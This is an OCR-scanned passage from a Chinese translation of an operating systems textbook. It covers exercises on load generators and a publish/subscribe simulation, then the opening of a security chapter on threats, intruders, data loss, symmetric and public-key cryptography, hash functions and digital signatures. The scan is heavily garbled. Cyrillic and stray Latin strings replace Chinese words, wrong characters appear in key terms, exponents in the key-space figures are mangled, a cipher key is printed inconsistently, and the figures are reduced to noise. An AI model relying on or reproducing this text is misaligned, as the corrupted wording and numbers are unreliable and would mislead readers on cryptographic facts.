器 模拟 轻 的 负载 ， 每 AJL 秒 随机 地 产生 (N/3) 
个 作业 。 为 这 两 个 负载 产生 器 调节 其 他 的 参数 
设置 ， 看 看 是 如 何 影响 探测 消息 的 数目 。 

实现 发 布 /订阅 系统 的 最 简单 的 方式 是 通过 一 
个 集中 的 代理 ， 这 个 代理 接收 发 布 的 文章 ， 然 
后 向 合适 的 订阅 者 分 发 这 些 文章 。 写 一 个 多 线 
程 的 应 用 程序 来 模拟 一 个 基于 代理 的 发 布 / 订 
ARR. 发 布 者 和 订阅 者 线程 可 以 通过 (共享 ) 
内 存 与 代理 进行 通信 。 每 个 消息 以 消息 长 度 域 
开头 ， 后 面 紧 跟着 其 他 字符 。 发 布 者 给 代理 发 
布 的 消息 中 ， 第 一 行 是 用 “.” 隔 开 的 层次 化 
主题 ， 后 面 一 行 或 多 行 是 发 布 的 文章 正文 。 订 
阅 者 给 代理 发 布 的 消息 ， 只 包含 着 一 行 用 “.” 
隔 开 的 层次 化 的 兴趣 行 (interest line) ， 表 示 
他 们 所 感 兴趣 的 文章 。 兴 趣 行 可 能 包含 “*.” 
等 通配符 ， 代 理 必须 返回 匹配 订阅 者 兴趣 的 所 
有 (过 去 的 ) 文章 ， 消 息 中 的 多 篇 文章 通过 
“BEGIN NEW ARTICLE” 来 分 隔 。 订 阅 者 必 
须 打 印 他 接收 到 的 每 条 消息 (如 他 的 兴趣 行 )。 
订阅 者 必须 连续 接收 任何 匹配 的 新 发 布 的 文 
章 。 发 布 者 和 订阅 者 线程 可 通过 终端 输入 “P” 
或 “S” 的 方式 自由 创建 (分 别 对 应 发 布 者 和 
订阅 者 ) ， 后 面 紧 跟 的 是 层次 化 的 主题 或 兴趣 
行 。 然 后 发 布 者 需要 输入 文章 ， 在 某 一 行 中 键 
入 “.” 表 示 文章 结束 。( 这 个 作业 也 可 以 通过 
基于 TCP 的 进程 间 通信 来 实现 )。 


第 9 章 安 全 


许多 公司 持 有 一 些 有 价值 的 并 加 以 密切 保护 的 信息 。 这 些 信息 可 以 是 技术 上 的 (如 新 款 芯片 或 软件 
的 设计 方案 )、 商 业 上 的 (如 针对 竞争 对 手 的 研究 报告 或 营销 计划 )、 财 务 方面 的 (如 股票 分 红 预 案 )、 
法 律 上 的 〈 如 潜在 并 购 方案 的 法 律 文本 ) 以 及 其 他 可 能 有 价值 的 信息 。 公 司 通常 在 存放 这 些 信息 的 大 楼 
入 口 处 安排 佩带 统一 微 章 的 警卫 ， 由 他 们 来 检查 进入 大 楼 的 人 群 。 并 且 ， 办 公 室 和 文件 柜 通 常会 上 锁 以 
确保 只 有 经 过 授权 的 人 才能 接触 到 这 类 信息 。 

家 用 计算 机 也 越 来 越 多 地 开始 保存 重要 的 数据 。 很 多 人 将 他 们 的 纳税 申报 单 和 信用 卡号 码 等 财务 信 
息 保存 在 计算 机 上 。 情 书 也 越 来 越 多 地 以 电子 信件 的 方式 出 现 . 目前 计算 机 硬盘 已 经 装 满 了 重要 的 照片 、 
视频 以 及 电影 。 

随 着 越 来 越 多 的 信息 存放 在 计算 机 系统 中 ， 确 保 这 些 信息 的 安全 就 变 得 越 来 越 重要 。 对 所 有 的 操作 
系统 而 言 ， 保 护 此 类 信息 不 被 未 经 许可 地 滥用 是 主要 考虑 的 问题 。 然 而 ， 随 着 计算 机 系统 的 广泛 使 用 
《和 随 之 而 来 的 系统 缺陷 ) ， 保 证 信息 安全 也 变 得 越 来 越 难 。 在 下 面 的 小 节 里 ， 我 们 将 讨论 有 关 安 全 与 防 
护 的 若干 话题 ， 其 中 一 些 内 容 与 我 们 保护 现实 生活 中 的 纸 质 文 件 比较 相似 ， 而 另 一 些 则 是 计算 机 系统 所 
独 有 的 。 在 这 一 章 里 ， 我 们 将 考察 安装 了 操作 系统 之 后 的 计算 机 安全 特性 。 

有 关 操 作 系统 安全 的 话题 在 过 去 的 二 十 年 里 产生 了 很 大 的 变化 。 在 20 世 纪 90 年 代 早期 之 前 ， 少 数 家 
庭 才 拥有 计算 机 ， 几 乎 所 有 的 计算 都 是 在 公司 、 大 学 和 其 他 一 些 拥有 多 用 户 计算 机 (从 大 型 机 到 微型 计 
算 机 ) 的 组 织 中 完成 的 。 这 些 机 器 几乎 都 是 相互 隔离 的 ， 没 有 任何 一 台 被 连接 到 网 络 中 。 在 这 样 的 环境 
下 ， 保 证 安全 性 所 要 做 的 全 部 工作 就 集中 在 了 如 何 保证 每 个 用 户 只 能 看 到 自己 的 文件 。 如 果 Tracy 和 
Marcia 是 同一 台 计算 机 的 两 个 注册 用 户 ， 那 么 “安全 性 ”就 是 保证 他 们 谁 都 不 能 读 取 或 修改 对 方 的 文件 ， 
除非 这 个 文件 被 设 为 共享 权限 。 复 杂 的 模型 和 机 制 被 开发 出 来 ， 以 保证 没有 哪个 用 户 可 以 获取 非法 权限 。 

有 时 这 种 安全 模型 和 机 制 涉及 一 类 用 户 ， 而 非 单个 用 户 。 例 如 ， 在 一 台 军 用 计算 机 中 ， 任 何 数 据 都 
必须 被 标记 为 “ 绝 “WE, RE RAR”, 而且 下 士 不 能 允许 查看 将 军 的 目录 ， 不 论 这 个 下 
士 是 谁 ， 无 论 他 想 要 查看 的 将 军 是 谁 ， 这 种 越权 访问 都 必须 被 禁止 。 在 过 去 的 几 十 年 中 ， 这 样 的 问题 被 
反复 地 研究 、 报 道 和 解决 。 

当时 一 个 潜在 的 假设 是 ， 一 旦 选 定 了 一 个 模型 并 据 此 实现 了 安全 系统 ， 那 么 实现 该 系统 的 软件 也 是 
正确 的 ， 会 完全 执行 选 定 的 安全 策略 。 通 常情 况 下 ， 模 型 和 软件 都 非常 简单 ， 因 此 该 假设 常常 是 成 立 的 。 
即 如 果 Tracy 理 论 上 不 被 允许 查看 Marcia 的 某 个 文件 ， 那 么 她 的 确 无 法 查看 。 

随 着 个 人 计算 机 和 互联 网 的 普及 ， 以 及 公用 大 型 机 和 小 型 机 的 消失 ， 情 况 发 生 了 变化 (尽管 不 是 翻 
天 禾 地 的 变化 ， 在 局 域 网 的 公共 服务 器 与 公用 小 型 计算 机 很 相似 )。 至 少 对 于 家 庭 用 户 来 说 ， 他 们 受到 
非法 用 户 人 侵 并 被 窃取 信息 的 威胁 变 得 不 存在 了 ， 因 为 别人 不 能 使 用 他 们 的 计算 机 。 

不 幸 的 是 ， 就 在 这 些 威胁 消失 的 同时 ， 另 一 种 威胁 悄然 而 至 (威胁 守恒 的 法 则 ?) : 来自 外 部 的 攻 
і, WW (Virus), kih (Worm) 和 其 他 恶意 代码 通过 互联 网 开始 在 计算 机 中 葡 延 ， 并 肆 无 蕊 翌 地 进行 
破坏 。 它 们 的 帮 是 软件 漏洞 的 爆炸 性 增长 ， 这 些 大 型 软件 已 经 开始 取代 以 前 好 用 的 小 软件 。 当 下 的 操 
作 系 统 包括 五 百 万 行 以 上 的 内 核 代码 和 100MB 级 的 应 用 程序 来 规定 系统 的 应 用 准则 ， 使 得 系统 中 存在 大 
量 可 以 被 恶意 代码 利用 的 漏洞 。 因 此 我 们 现在 从 形式 上 证 明 是 安全 的 系统 却 可 能 很 容易 被 侵入 ， 因 为 代 
码 中 的 泼 洞 可 能 允许 恶意 软件 做 一 些 原则 上 被 禁止 的 事情 。 

基于 以 上 问题 ， 本 剖 将 分 为 两 部 分 进行 讨论 。9.1 节 从 一 些 细节 上 分 析 系 统 威胁 ， 看 看 哪些 是 我 们 
想 要 保护 的 。9.2 节 介绍 了 安全 领域 中 基本 但 却 重要 的 工具 ， 现代 密码 学 。9.3 节 介绍 了 关于 安全 的 形式 
化 模型 ， 并 论述 如 何在 用 户 之 间 进 行 安全 的 访问 和 保护 ， 这 些 用 户 既 有 保密 的 数据 ， 也 有 与 其 他 用 户 共 
享 的 数据 。 
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接 下 来 的 五 节 将 讨论 实际 存在 的 安全 问题 , 对 实际 的 恶意 代码 防护 和 计算 机 安全 研究 前 沿 进行 讨论 ， 
最 后 是 一 个 简短 的 总 结 。 

值得 注意 的 是 ， 尽 管 本 书 是 关于 操作 系统 的 ， 然 而 操作 系统 安全 与 网 络 安全 之 间 却 有 着 不 可 分 离 的 
联系 ， 无 法 将 它们 分 开 讨论 。 例 如 ， 病 毒 通过 网 络 侵入 到 计算 机 中 ， 破 坏 操 作 系统 。 总 而 言 之 ， 我 们 趋 
于 做 足 工作 ， 即 包含 很 多 与 主题 紧密 相关 却 并 不 属于 操作 系统 研究 领域 的 内 容 。 


9.1 环境 安全 

我 们 从 几 个 术语 的 定义 来 开始 本 章 的 学 习 。 有 些 人 不 加 区 分 地 使 用 “安全 ”(security) 和 “防护 " 
(protection) 两 个 术语 。 然 而 ， 当 我 们 讨论 基本 问题 时 有 必要 去 区 分 “安全 ”与 “防护 ”的 含义 。 这 些 
基本 问题 包括 确保 文件 不 被 未 经 授权 的 人 读 取 或 自 改 。 这 些 问 题 一 方面 包括 涉及 技术 、 管 理 、 法 律 和 政 
治 方面 的 问题 ， 另 一 方面 也 包括 使 用 特定 的 操作 系统 机 制 来 提供 安全 保障 的 问题 。 为 了 避免 混 消 ， 我 们 
用 术语 “安全 ”来 表示 所 有 的 基本 问题 ， 用 术语 “防护 机 制 ”来 表示 用 特定 的 操作 系统 机 制 确保 计算 机 
信息 安全 。 但 是 两 个 术语 之 间 的 界限 没有 定义 。 接 下 来 我 们 看 一 看 安全 问题 的 特点 是 什么 ， 稍 后 我 们 将 
研究 防护 机 制 和 安全 模型 以 帮助 获取 安全 屏障 。 

安全 包含 许多 方面 的 内 容 ， 其 中 比较 主要 的 三 个 方面 是 威胁 的 实质 、 入 侵 者 的 本 性 和 数据 的 意外 遗 
失 。 我 们 将 分 别 加 以 研究 。 


9.1.1 威胁 
从 安全 性 角度 来 讲 ， 计 算 机 系统 有 四 个 主要 目标 ， 同 时 也 面临 着 三 个 主要 威胁 ， 如 图 9-1 所 示 。 第 
一 个 目标 是 数据 保密 (data confidentiality) ， 指 将 机 密 的 数 EE ни 


据 置 于 保密 状态 。 更 确切 地 说 ， 如 果 数 据 所 有 者 决定 这 些 
数据 仅 用 于 特定 的 人 而 不 是 其 他 人 ， 那 么 系统 就 应 该 保证 
数据 绝对 不 会 发 布 给 未 经 授权 的 人 。 数 据 所 有 者 至 少 应 该 
有 能 力 指定 谁 可 以 阅读 哪些 信息 ， 而 系统 则 对 用 户 的 选择 
进行 强制 执行 ， 这 种 执行 的 粒度 应 该 精确 到 文件 。 

第 二 个 目标 数据 完整 性 (data integrity) 是 指 未 经 授 
权 的 用 户 没 有 得 到 许可 就 擅自 改动 数据 。 这 里 所 说 的 改动 不 仅 是 指 改变 数据 的 值 ， 而 且 还 包括 删除 数据 
以 及 添加 错误 的 数据 等 情况 。 如 果 系 统 在 数据 所 有 者 决定 改动 数据 之 前 不 能 保证 其 原封 未 动 ， 那么 这 样 
的 安全 系统 就 毫 无 价值 可 言 。 

第 三 个 目标 系统 可 用 性 (system availability) 是 指 没有 人 可 以 扰乱 系统 使 之 瘫痪 。 导 致 系统 拒绝 服 
务 的 攻击 十 分 普遍 。 比 如 ， 如 果 有 一 台 计算 机 作为 Internet 服 务 器 ， 那么 不 断 地 发 送 请 求 会 使 该 服务 器 瘫 
首 ， 因 为 单 是 检查 和 丢弃 进来 的 请 求 就 吞噬 掉 所 有 的 CPU 资 源 。 在 这 样 的 情况 下 ， 若 系统 处 理 一 个 阅读 
网 页 的 请 求 需 要 100us， 那 么 任何 人 每 秒 发 送 10 000 个 这 样 的 请 求 就 会 导致 系统 死机 。 许 多 合理 的 系统 
模型 和 技术 能 够 保证 数据 的 机 密 性 和 完整 性 ， 但 是 避免 拒绝 服务 却 相当 困难 。 

最 后 ， 近 年 来 操作 系统 出 现 了 新 的 威胁 ， 计 算 机 合法 用 户 以 外 的 人 可 以 (通过 病毒 和 其 他 手段 ) 获 
取 一 些 家 用 计算 机 的 控制 权 ， 并 将 这 些 计算 机 变 成 售 尸 (zombie) ， 入 侵 者 立即 成 为 这 些 计算 机 的 新 主 
人 。 通 常情 况 下 ， 这 些 僵尸 用 来 发 送 垃圾 邮件 ， 从 而 使 得 垃圾 邮件 的 真正 来 源 难以 追踪 到 。 

从 某 种 意义 上 讲 ， 还 存在 着 另 一 种 威胁 ， 这 种 威胁 与 其 说 是 针对 个 人 用 户 的 威胁 ， 不 如 说 是 对 社会 
的 威胁 。 有些 人 对 某 些 国家 或 种 族 不 满 ， 或 对 世界 感到 愤怒 ， 妄图 摊 毁 尽 可 能 多 的 机 构 ， 而 不 在 意 破坏 性 
和 受害 者 。 这 些 人 常常 觉得 攻击 “敌人 ”的 计算 机 是 一 件 令 人 愉悦 的 事情 ， 然而 并 不 在 意 “ 攻 击 ” 本 身 。 

安全 问题 的 另 一 个 方面 是 隐私 (privacy) ; 即 保证 私人 的 信息 不 被 滥用 。 隐 私 会 导致 许多 法 律 和 道 
德 问题 。 政 府 是 否 应 该 为 每 个 人 编制 档案 来 追查 罪犯 ? 如 盗窃 犯 或 逃税 犯 。 警 察 是 否 可 以 为 了 制止 有 组 
织 犯罪 而 调查 任何 人 或 任何 事件 ? 当 这 些 特权 与 个 人 权益 发 生 冲 突 时 会 怎么 样 ? 所 有 这 些 话题 绝对 都 是 
十 分 重要 的 ， 但 是 它们 却 超出 了 本 书 的 范围 。 
9.1.2 лав 

我 们 中 的 大 多 数 人 非常 善良 并 且 守法 ， 那么 为 什么 要 担心 安全 问题 呢 ? 因为 ， 我 们 周围 的 还 有 少数 
АЖЕ. БП ЖЛ ЖИД (可 能 为 了 自己 的 商业 利益 ) 。 从 安全 性 的 角度 来 说 ， 那 些 喜 欢 间 入 与 


图 9-1 安全 性 的 目标 和 威胁 
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自己 毫 不 相干 区 域 的 人 叫做 入 侵 者 (intruder) 或 敌人 (adversary) 。 入 侵 者 表现 为 两 种 形式 ， 被 动人 侵 
者 仅仅 想 阅读 他 们 无 权 阅 读 的 文件 ， 主 动人 侵 者 则 怀 有 恶意 ， 他 们 未 经 授权 就 想 改动 数据 。 当 我 们 设计 
操作 系统 抵御 人 侵 者 时 ， 必 须 牢记 要 抵御 哪 一 种 人 侵 者 。 通 常 的 入 侵 者 种 类 包括 ; 

1. 非 专业 用 户 的 随意 浏览 。 许 多 人 的 工作 台 上 都 有 个 人 计算 机 并 连接 到 共享 文件 服务 器 上 。 人 类 的 
本 性 促使 他 们 中 的 一 些 人 想 要 阅读 他 人 的 电子 邮件 或 文件 ， 而 这 些 电子 邮件 和 文件 往往 没有 设防 。 例 如 ， 
大 多 数 的 UNIX 系 统 在 默认 情况 下 新 建 的 文件 是 可 以 公开 访问 的 。 

2. 内 部 人 员 的 窥视 。 学 生 、 系 统 程序 员 、 操 作 员 或 其 他 技术 人 员 经 常 把 进入 本 地 计算 机 系统 作为 个 
人 挑战 之 一 。 他 们 通常 拥有 较 高 技能 ， 并 且 愿 意 花费 长 时 间 的 努力 。 

3. 为 获取 利益 而 尝试 。 有 些 银行 程序 员 试图 从 他 们 工作 的 银行 窃取 金钱 。 他 们 使 用 的 手段 包括 改变 
应 用 软件 使 得 利息 不 被 四 舍 五 入 而 是 直接 截断 ， 并 将 截断 下 来 的 不 足 一 分 钱 的 部 分 留 给 自己 ， 或 者 调 走 
多 年 不 使 用 的 账户 ， 或 者 发 信 敲 诈 勒 索 (“ 付 钱 给 我 ， 否 则 我 将 破坏 所 有 的 银行 记录 ”)。 

4. 商业 或 军事 间谍 。 间 谍 指 那些 受到 竞争 对 手 或 外 国 的 资助 并 且 具 有 很 明确 目的 的 人 ， 他 们 的 目的 
在 于 窃取 计算 机 程序 、 交 易 数据 、 专 利 、 技 术 、 芯 片 设计 方案 和 商业 计划 等 。 这 些 非法 企图 通常 使 用 窃 
听 手 段 ， 有 时 甚至 通过 搭建 天 线 来 收集 目标 计算 机 发 出 的 电磁 辐射 

我 们 必须 十 分 清楚 防止 敌对 国家 政府 窃取 军事 秘密 与 防止 学 生 在 计算 机 系统 内 放 入 笑话 的 不 同 。 安 
全 和 防护 上 所 做 的 努力 应 该 取决 于 针对 哪 一 类 入 侵 者 。 

近年 来 ， 另 一 类 安全 上 的 隐患 就 是 病毒 ， 我 们 将 在 以 后 的 章节 中 详细 讨论 它 。 简 而 言 之 ， 病 毒 就 是 
一 段 能 够 自我 复制 并 通常 会 产生 危害 的 程序 代码 。 从 某 种 意义 上 来 说 ， 编 写 病 毒 的 人 也 是 入 侵 者 ， 他 们 
往往 拥有 较 高 的 专业 技能 。 一 般 的 入 侵 者 和 病毒 的 区 别 在 于 ， 前 者 指 想 要 私自 间 入 系统 并 进行 破坏 的 个 
人 ， 后 者 指 被 人 编写 并 释放 传播 企图 引起 危害 的 程序 。 入 侵 者 设法 进入 特定 的 计算 机 系统 (如 属于 银行 
或 五 角 大 楼 的 某 台 机 器 ) 来 窃取 或 破坏 特定 的 数据 ， 而 病毒 作者 常常 想 造成 破坏 而 不 在 乎 谁 是 受害 者 。 


9.1.3 数据 意外 遗失 

除了 恶意 入侵 造成 的 威胁 外 ， 有 价值 的 信息 也 会 意外 遗失 。 造 成 数据 意外 遗失 的 原因 通常 包括 ， 

LRR: 火灾 、 洪 水 、 地 震 、 战 争 、 暴 乱 或 老鼠 对 磁带 和 软盘 的 撕 咬 。 

2. 软 硬 件 错误 ， CPU 故障 、 磁 般 或 磁带 不 可 读 、 通 信 故 障 或 程序 里 的 错误 。 

3. 人 为 过 失 : 不 正确 的 数据 登录 、 错 误 的 磁带 或 磁盘 安装 、 运 行 了 错误 的 程序 、 磁 带 或 磁盘 的 遗失 ， 
以 及 其 他 的 过 失 等 。 

上 述 大 多 数 情 况 可 以 通过 适当 的 备份 ， 尤 其 是 对 原始 数据 的 远 地 备 份 来 避免 。 在 防范 数据 不 被 狭 独 
的 入侵 者 获取 的 同时 ， 防 止 数据 意外 遗失 应 得 到 更 广泛 的 重视 。 事 实 上 ， 数 据 意外 遗失 带 来 的 损失 比 入 
侵 者 带 来 的 损失 可 能 更 大 。 


9.2 密码 学 原理 

加 密 在 安全 领域 扮演 着 非常 重要 的 角色 。 很 多 人 对 于 报纸 上 的 字谜 (newspaper cryptograms) 都 不 
陌生 ， 这 种 加 密 算法 不 过 是 一 个 字迹 游戏 ， 其 中 明文 中 的 每 个 字母 被 替换 为 另 一 个 字母 。 这 种 加 密 算法 
与 现代 加 密 算 法 有 着 非常 紧密 的 关联 (就 像 热 狗 与 高 级 谈 饪 术 之 间 的 关系 一 样 )。 在 本 节 中 我 们 将 乌 欧 
计算 机 时 代 的 密码 学 ， 其 中 的 某 些 内 容 可 能 会 对 读者 理解 后 续 章节 有 所 帮助 ， 任 何 对 安全 这 个 话题 感 兴 
趣 的 读者 都 应 该 对 本 章 中 讲述 的 基本 问题 有 所 了 解 。 但 是 ， 对 密码 学 的 详细 阐述 超越 了 本 书 的 范围 。 不 
过 ,许多 优秀 的 书籍 都 详细 讨论 了 这 一 话题 ， 有 兴趣 的 读者 可 以 拿 来 参考 (如 Kaufman 等 人 ，2002， 
Pfleeger，2006)。 接 下 来 ， 我 们 为 不 太 熟 悉 密 码 学 的 读者 做 一 个 快速 简介 。 

加 密 的 目的 是 将 明文 一 一 也 就 是 原始 信息 或 文件 ， 通 过 某 种 手段 变 为 害 文 ， 通 过 这 种 手段 ， 只 有 经 
过 授权 的 人 才 知 道 如 何 将 密 文 恢复 为 明文 。 对 无 关 的 人 来 说 ， 密 文 是 一 段 无 法 理解 的 编码 。 虽 然 这 -- 领 
域 对 初学 者 来 说 听 上 去 比较 新 奇 ， 但 是 加 密 和 解密 算法 (函数 ) 往往 是 公开 的 。 要 想 确保 加 密 算法 不 被 
泄露 是 徒劳 的 ， 否 则 就 会 使 一 些 想 要 保密 数据 的 人 对 系统 的 安全 性 产生 错误 理解 。 在 专业 上 ， 这 种 策略 
叫做 模糊 安全 (security by obscurity) ， 而 且 只 有 安全 领域 的 爱好 者 们 才 使 用 该 策略 。 奇 怪 的 是 ， 在 这 些 
爱好 者 中 也 包括 了 许多 跨国 公司 ， 但 是 他 们 应 该 是 了 解 更 多 专业 知识 的 。 
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在 算法 中 使 用 的 加 密 参 数 叫 做 密 钥 (кеу). ЕРК, ККЗ, СЕЖУ, ERK 
加 密 算法 ( 即 ， 函 数 )， 那 么 C = EP, Ke)。 这 就 是 加 密 的 定义 。 其 含义 是 把 明文 P 和 加 密 密 钥 Ke 作为 参 
数 ， 通 过 加 密 算法 E 就 可 以 把 明文 变 为 密 文 。 荷 兰 密码 学 家 Kerckhoffs 于 19 世 纪 提出 了 Kerckhoffs 原 则 。 
该 原则 认为 ， 加 密 算法 本 身 应 该 完全 公开 ， 而 加 密 的 安全 性 由 独立 于 加 密 算法 之 外 的 密 钥 决 定 。 现 在 所 
有 严谨 的 密码 学 家 都 遵循 这 一 原则 。 

同样 地 ， 当 DD 表示 解密 算法 ，Ko 表示 解密 密 钥 时 ，P = D(C, Ko)。 也 就 是 说 ， 要 想 把 密 文 还 原 成 明文 ， 
可 以 用 密 文 C 和 解密 密 钥 Ko 作为 参数 ， 通 过 解密 算法 D 进 行 运算 。 这 两 种 互 逆 运算 间 的 关系 如 图 9-2 所 示 。 


k, a "И к, a WERN 

С= Е(Р,К,) P =D (С, Kp) 

Р Е > D „> P 
EX 

明文 输入 明文 

加 密 算法 解密 算法 н 
=>) t 2 
р 解密 


图 9-2 明文 和 密 文 间 的 关系 
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为 了 描述 得 更 清楚 些 ， 我 们 假设 在 某 一 个 加 密 算法 里 每 一 个 字母 都 由 另 一 个 不 同 的 字母 赫 代 ， 如 所 
有 的 A 被 Q 替 代 ， 所 有 的 B 被 W 替 代 ， 所 有 的 C 被 E 替 代 ， 以 下 依次 类 推 ; 

明文 ABCDEFGHIJKLMNOPQRSTUVWXYZ 

YX: QWERTYUIOPASDFGHJKLZXCVBNM 

这 种 密 钥 系统 叫做 单字 母 普 换 ，26 个 字母 与 整个 字母 表 相 匹配 。 在 这 个 实例 中 的 加 密 密 钥 为 : 
QWERTYUIOPASDFGHJKLZXCYBNM。 利 用 这 样 的 密 钥 ， 我 们 可 以 把 明文 ATTACK 转 换 为 QZZQEA 。 
同时 ， 利 用 解密 密 钥 可 以 告诉 我 们 如 何 把 密 文 恢复 为 明文 。 在 这 个 实例 中 的 解密 密 钥 为 : 
KXVMCNOPHQRSZYIJADLEGWBUFT。 我们 可 以 看 到 密 文中 的 A 是 明文 中 的 Kk， 密 文中 的 B 是 明文 中 
的 X， 其 他 字母 依次 类 推 。 

从 表面 上 看 ， 这 是 一 个 安全 的 密 钥 机 制 ， 因 为 密码 破译 者 虽然 知道 普通 密 钥 机 制 (字母 与 字母 间 的 
替换 ) ， 但 他 并 不 知道 26!~ 4 x 10* 中 哪 一 个 是 可 能 的 密 钥 。 但是， 给 定 一 小 段 窗 文 ， 这 个 密码 还 是 能 够 
被 轻易 破译 掉 。 破 译 的 基础 在 于 利用 了 自然 语言 的 统计 特性 。 在 英语 中 ， 如 e 是 最 常用 的 字母 。 接 下 来 是 
t, о, а, п, i 等 。 最 常用 的 双 字 母 组 合 有 耻 ，in，er，re 等 。 利 用 这 类 信息 ， 破译 该 密码 是 较为 容易 的 。 

许多 类 似 的 密 钥 系 统 都 有 这 样 一 个 特点 ， 那 就 是 给 定 了 加 密 密 钥 就 能 够 较为 容易 地 找到 解密 密 钥 ， 
反之 亦 然 。 这 样 的 系统 采用 了 私 钥 加 宕 技术 或 对 称 密 钥 加 密 技术 。 虽然 单字 母 替换 方式 没有 使 用 价值 ， 
但 是 如 果 密 钥 有 足够 的 长 度 ， 对 称 密 钥 机 制 还 是 相对 比较 安全 的 。 对 严格 的 安全 系统 来 说 ， 最 少 需要 使 
用 256 位 密 钥 ， 因 为 它 的 破译 空间 为 2*~ 1.2 x 107。 短 密 钥 只 能 够 抵挡 业余 爱好 者 ， 对 政府 部 门 来 说 却 
是 不 安全 的 。 

9.22 公 钥 加 密 技术 

由 于 对 信息 进行 加 密 和 解密 的 运算 量 是 可 控制 的 ， 所 以 私 钥 加 密 体系 十 分 有 用 。 但 是 它 也 有 一 个 缺 
陷 : 发 送 者 与 接受 者 必须 同时 拥有 密 钥 。 他 们 甚至 必须 有 物理 上 的 接触 ， 才能 传递 密 钥 。 为 了 解决 这 个 
矛盾， 人们 引入 了 公 铜 加 密 技 术 (1976 年 由 Diffie 和 Hellman 提 出 ) 。 这 一 体系 的 特点 是 加 密 密 钥 和 解密 
密 钥 是 不 同 的 ， 并 且 当 给 出 了 一 个 往 选 过 的 加 密 密 钥 后 不 可 能 推出 对 应 的 解密 密 钥 。 在 这 种 特性 下 ， 加 
密 密 钥 可 被 公开 而 只 有 解密 密 钥 处 于 秘密 状态 。 

为 了 让 大 家 感受 一 下 公 铀 密码 体制 ， 请 看 下 面 两 个 问题 ; 
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问题 1: 314159265358979 х 314159265358979 等 于 多 少 ? 

问题 2，3912571506419387090594828508241 的 平方 根 是 多 少 ? 

如 果 给 一 张 纸 和 一 支 笔 :加 上 一 大 杯 冰 激 凌 作为 正确 答案 的 奖励 ， 那 么 大 多 数 六 年 级 学 生 可 以 在 一 
两 个 小 时 内 做 出 问题 1 的 答案 。 而 如 果 给 一 般 成 年 人 纸 和 笔 ， 并 许诺 回答 出 正确 答案 可 以 免 去 终身 50% 
税收 的 话 ， 大 多 数 人 还 是 不 能 在 没有 计算 器 、 计 算 机 或 其 他 外 界 帮助 的 条 件 下 解答 出 问题 2 的 答案 。 虽 
然 平方 和 求 平方 根 互 为 逆 运 算 ， 但 是 它们 在 计算 的 复杂 性 上 却 有 很 大 差异 。 这 种 不 对 称 性 构成 了 公 钥 密 
码 体系 的 基础 。 在 公 钥 密码 体系 中 ， 加 密 运算 比较 简单 ， 而 没有 密 钥 的 解密 运算 却 十 分 繁琐 。 

一 种 叫做 RSA 的 公 钥 机 制 表 明 : 对 计算 机 来 说 ， 大 数 乘法 比 对 大 数 进行 因 式 分 解 要 容易 得 多 ， 特 别 
是 在 使 用 取 模 算法 进行 运算 且 每 个 数字 都 有 上 百 位 时 (Rivest 等 人 , 1978) 。 这 种 机 制 广泛 应 用 于 密码 领 
域 。 其 他 广泛 使 用 的 还 有 离散 对 数 (El Gamal, 1985) 。 公 钥 机 制 的 主要 问题 在 于 运算 速度 要 比 对 称 密 钥 
机 制 慢 数 千 倍 。 

当 我 们 使 用 公 钥 密码 体系 时 ， 每 个 人 都 拥有 一 对 密 钥 ( 公 钥 和 私 钥 ) 并 把 其 中 的 公 钥 公开 。 公 和 钥 是 
加 密 密 钥 ， 私 钥 是 解密 密 钥 。 通 常 密 钥 的 运算 是 自动 进行 的 ， 有 时 候 用 户 可 以 自选 密码 作为 算法 的 种 子 。 
在 发 送 机 密 信息 时 ， 用 接收 方 的 公 钥 将 明文 加 密 。 由 于 只 有 接收 方 拥有 私 钥 ， 所 以 也 只 有 接收 方 可 以 解 
В. 


9.23 单 向 函数 

在 接 下 来 的 许多 场合 里 ， 我 们 将 看 到 有 些 函 数 /， 其 特性 是 给 定 f 和 参数 *， 很 容易 计算 出 y = 了 (x)。 
但 是 给 定 f(x)， 要 找到 相应 的 x 却 不 可 行 。 这 种 函数 采用 了 十 分 复杂 的 方法 把 数字 打 乱 。 具 体 做 法 可 以 
首先 将 ?初始 化 为 r。 然 后 可 以 有 一 个 循环 ， 进 行 多 次 过 代 ， 只 要 在 zx 中 有 1 位 就 继续 迭代 ， 随 着 每 次 迭代 ， 
y 中 的 各 位 的 排列 以 与 过 代 相 关 的 方式 进行 ， 每 次 迭代 时 添加 不 同 的 常数 ， 最 终生 成 了 彻底 打 乱 位 的 数 
字 排 列 。 这 样 的 函数 叫做 加 密 散 列 函数 。 


924 数字 签名 

经 常 性 地 使 用 数字 签名 是 很 有 必要 的 。 例 如 ， 假 设 银行 客户 通过 发 送 电子 邮件 通知 银行 为 其 购买 股 
票 。 一 小 时 后 ， 定 单 发 出 并 成 交 ， 但 随后 股票 大 跌 了 。 现 在 客户 否认 曾经 发 送 过 电子 邮件 。 银 行当 然 可 
以 出 示 电 子 邮件 作为 证 据 ， 但 是 客户 也 可 以 声称 是 银行 为 了 获得 佣金 而 伪造 了 电子 邮件 。 那 么 法 官 如 何 
来 找到 真相 呢 ? 

通过 对 邮件 或 其 他 电子 文档 进行 数字 签名 可 以 解决 这 类 问题 ， 并 且 保 证 了 发 送 方 日 后 不 能 抵赖 。 其 
中 的 一 个 通常 使 用 的 办 法 是 首先 对 文档 运行 一 种 单 向 散 列 运算 (hashing) ， 这 种 运算 几乎 是 不 可 逆 的 。 
散 列 函数 通常 独立 于 原始 文档 长 度 产生 一 个 固定 长 度 的 结果 值 。 最 常用 的 散 列 函 数 有 MD5 (Message 
Digest 5)， 一 种 可 以 产生 16 个 字 节 结果 的 算法 (Rivest, 1992) 以 及 SHA-1 (Secure Hash Algorithm) , 
一 种 可 以 产生 20 个 字 节 结果 的 算法 (NIST，1995)。 比 SHA-1 更 新 版 本 有 SHA-256 和 SHA-512， 它 们 分 
别 产 生 32 字 节 和 64 字 节 的 散 列 结果 ， 但 是 迄今 为 止 ， 这 两 种 加 窗 算 法 依然 没有 得 到 广泛 使 用 。 

下 一 步 假设 我 们 使 用 上 面 讲 过 的 公 和 钥 密 码 。 文 件 所 有 者 利用 他 的 私 钥 对 散 列 值 进行 运算 得 到 D( 散 列 值 )。 
该 值 称 为 签名 块 《signature block) ， 它 被 附加 在 文档 之 后 传送 给 接收 方 ， 如 图 9-3 所 示 。 对 散 列 值 应 用 D 有 些 像 
散 列 解密 ， 但 这 并 不 是 真正 意义 上 的 解密 ， 因 为 散 列 值 并 没有 被 加 密 。 这 不 过 是 对 散 列 值 进行 的 数学 变换 。 


对 散 列 值 运 
文档 压缩 后 
得 到 散 列 人 ято 
СТ 
жж { (оао 
